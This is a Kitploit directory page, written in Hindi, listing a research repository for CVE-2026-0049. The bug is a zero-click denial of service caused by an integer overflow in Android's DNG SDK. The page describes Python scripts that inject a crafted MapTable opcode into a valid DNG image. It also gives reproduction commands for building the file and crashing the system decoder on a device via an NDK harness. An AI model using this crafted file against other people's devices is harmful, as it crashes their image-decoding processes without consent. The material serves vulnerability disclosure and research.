Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-0049 — Android के DNG SDK में एक zero-click DoS का PoC और विश्लेषण, जिसमें तैयार किए गए DNG नमूने, एक NDK क्रैश हार्नेस, और MapTable overflow का UBSan/IntSan पुनरुत्पादन शामिल है। | Kitploit
उपकरण/GitHubGitHub/r3n3r0/cve-2026-0049
एंड्रॉइड सुरक्षापेलोड जनरेशनभेद्यता विश्लेषणशोषणबाइनरी विश्लेषणपेपर और शोधलर्निंग और शिक्षा
GitHubr3n3r0/cve-2026-0049

CVE-2026-0049

Android के DNG SDK में एक zero-click DoS का PoC और विश्लेषण, जिसमें तैयार किए गए DNG नमूने, एक NDK क्रैश हार्नेस, और MapTable overflow का UBSan/IntSan पुनरुत्पादन शामिल है।

रिपॉजिटरी देखें
81 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-0049 — एंड्रॉइड DNG ज़ीरो-क्लिक DoS (dng_sdk MapTable add-overflow)

पूर्ण शोध सामग्री और PoC। कथात्मक विश्लेषण: 🇮🇹 BLOG.md · 🇬🇧 BLOG.en.md।

  • बग: fAreaSpec.Plane() + fAreaSpec.Planes() पर unsigned integer ओवरफ्लो — dng_opcode_MapTable::ProcessArea में (dng_sdk/source/dng_misc_opcodes.cpp:388)।
  • प्रभाव: ज़ीरो-क्लिक DoS। Android जिस IntSan के साथ libdng_sdk.so को संकलित करता है, वह ओवरफ्लो को abort() → SIGABRT में बदल देता है उस प्रक्रिया में जो DNG को डिकोड करती है।
  • यह RCE नहीं है (लूप पर दोहरा बाउंड → कोई OOB नहीं)। BLOG.md का §12 देखें।
  • गंभीरता: Google (बुलेटिन) इसे Critical घोषित करता है; NVD/CISA Medium (CVSS 6.2) — एक ही CVE पर दो अलग-अलग वर्गीकरण (§13)।
  • फिक्स: Android Security Bulletin अप्रैल 2026 (पैच 2026-04-01, A-456471290)। दो पैच: dng_sdk में अंकगणितीय सुधार (+ को - के रूप में फिर से लिखा गया) + LocalImageResolver.java में MIME allowlist जो DNG को अस्वीकार करती है (§14)।

लेख इन विवरणों को भी शामिल करता है: PoC निर्माण की पूरी प्रक्रिया (§6), NDK harness का उपयोग क्यों किया गया (§7), UBSan/IntSan फ़्लैग -fsanitize=undefined बनाम =integer, recover/no-recover/trap, full बनाम minimal runtime (§10), और IntSan बनाम SafeInt बनाम MTE (§11) के बीच अंतर।

संरचना

root@kitploit:~
CVE-2026-0049/
├── BLOG.md                       articolo completo — italiano (17 sezioni)
├── BLOG.en.md                    full article — English (17 sections)
├── poc/
│   ├── inject_opcode.py          [PRINCIPALE] inietta OpcodeList2/MapTable in un DNG valido
│   ├── gen_base_dng.py           genera il DNG Bayer valido di base (richiede pidng)
│   ├── make_dng.py               generatore stand-alone (DNG minimale + opcode)
│   └── make_poc_dng.py           primo generatore from-scratch (LinearRaw minimale)
├── harness/
│   ├── decode_poc.c              harness NDK AImageDecoder (crash on-device)
│   └── dng_xmp_stub.cpp          stub XMP per compilare dng_validate su PC
├── samples/
│   ├── valid_poc.dng             PoC funzionante (fa crashare il decoder di sistema)
│   ├── base_benign.dng           controllo benigno (decodifica senza crash)
│   └── poc_minimal.dng           variante minimale from-scratch
└── evidence/
    ├── crash_backtrace.txt       tombstone reale dal Pixel 9
    └── device_analysis.md        analisi binaria libdng_sdk.so + IntSan/SafeInt/MTE

त्वरित पुनरुत्पादन

A) दुर्भावनापूर्ण DNG

root@kitploit:~
pip install pidng
python3 poc/gen_base_dng.py base                     # -> base.dng (Bayer valido)
python3 poc/inject_opcode.py base.dng valid_poc.dng poc
# oppure usa direttamente samples/valid_poc.dng

महत्वपूर्ण विवरण: AreaSpec गैर-खाली होना चाहिए (0,0,H,W); खाली क्षेत्र के साथ Android की dng_sdk शॉर्ट-सर्किट करती है और डिकोडिंग बिना क्रैश के त्रुटि लौटाती है (BLOG.md का §6.6 देखें)। एक पूरी तरह से मान्य DNG की आवश्यकता क्यों है, न कि मिनिमल वाली: SkRawCodec (सिस्टम डिकोडर) Glide/Photos की तुलना में अधिक सख्त है और बिना पूर्ण रंग मेटाडेटा वाले DNG को अस्वीकार करता है (§2, §6.1)।

B) ऑन-डिवाइस क्रैश (NDK harness)

root@kitploit:~
$NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang \
    -O0 -o decode_poc harness/decode_poc.c -ljnigraphics
adb push decode_poc valid_poc.dng /data/local/tmp/     # NB: /data/local/tmp, NON /sdcard (FUSE)
adb shell /data/local/tmp/decode_poc /data/local/tmp/valid_poc.dng
# -> Abort message: 'ubsan: add-overflow' ; SIGABRT in dng_opcode_MapTable::ProcessArea

C) dng_validate + UBSan के साथ PC पर पुनरुत्पादन (बिना फ़ोन के)

dng_sdk स्रोतों को -fsanitize=integer -fno-sanitize-recover लागू करके केवल dng_misc_opcodes.cpp पर संकलित करें (XMP SDK के बिना लिंक करने के लिए harness/dng_xmp_stub.cpp का उपयोग करें)। फिर:

root@kitploit:~
./dng_validate samples/valid_poc.dng
# dng_misc_opcodes.cpp:388:32: runtime error: unsigned integer overflow: 4294967040 + 512

केवल शोध/शैक्षिक उद्देश्यों के लिए। केवल स्वामित्व वाले हार्डवेयर पर परीक्षण किया गया।

टूल डाउनलोड करें